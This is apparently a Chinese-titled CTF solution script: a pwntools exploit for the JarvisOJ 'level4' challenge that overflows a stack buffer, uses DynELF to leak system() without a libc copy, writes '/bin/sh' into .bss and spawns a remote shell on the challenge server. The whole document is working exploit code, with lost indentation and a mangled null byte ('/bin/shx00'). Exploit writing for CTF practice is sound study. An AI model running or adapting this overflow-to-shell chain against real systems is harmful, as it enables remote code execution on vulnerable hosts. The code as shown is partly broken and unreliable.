借助DynELF实现无libc的漏洞利用小结
#!/usr/bin/env python
# coding:utf-8
from pwn import *
elf = ELF('level4')
write_plt = p32(elf.symbols['write'])
start_addr = p32(elf.symbols['_start'])
read_plt = p32(elf.symbols['read'])
data_addr = p32(elf.symbols['__bss_start'])
junk = "A" * (0x88 + 4)
Io = remote("pwn2.jarvisoj.com", 9880)
def leak(addr):
payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4)
Io.send(payload)
leaked = Io.recv(4)
print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)), repr(leaked))
return leaked
# leak the address of system()
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup('system', 'libc')
print "[system()] -> [%s]" % (hex(system_addr))
# write /bin/sh
payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)
Io.send(payload)
# send /bin/sh
Io.send("/bin/shx00")
# call system
#read_output()
payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr
Io.send(payload)
# interactive()
Io.interactive()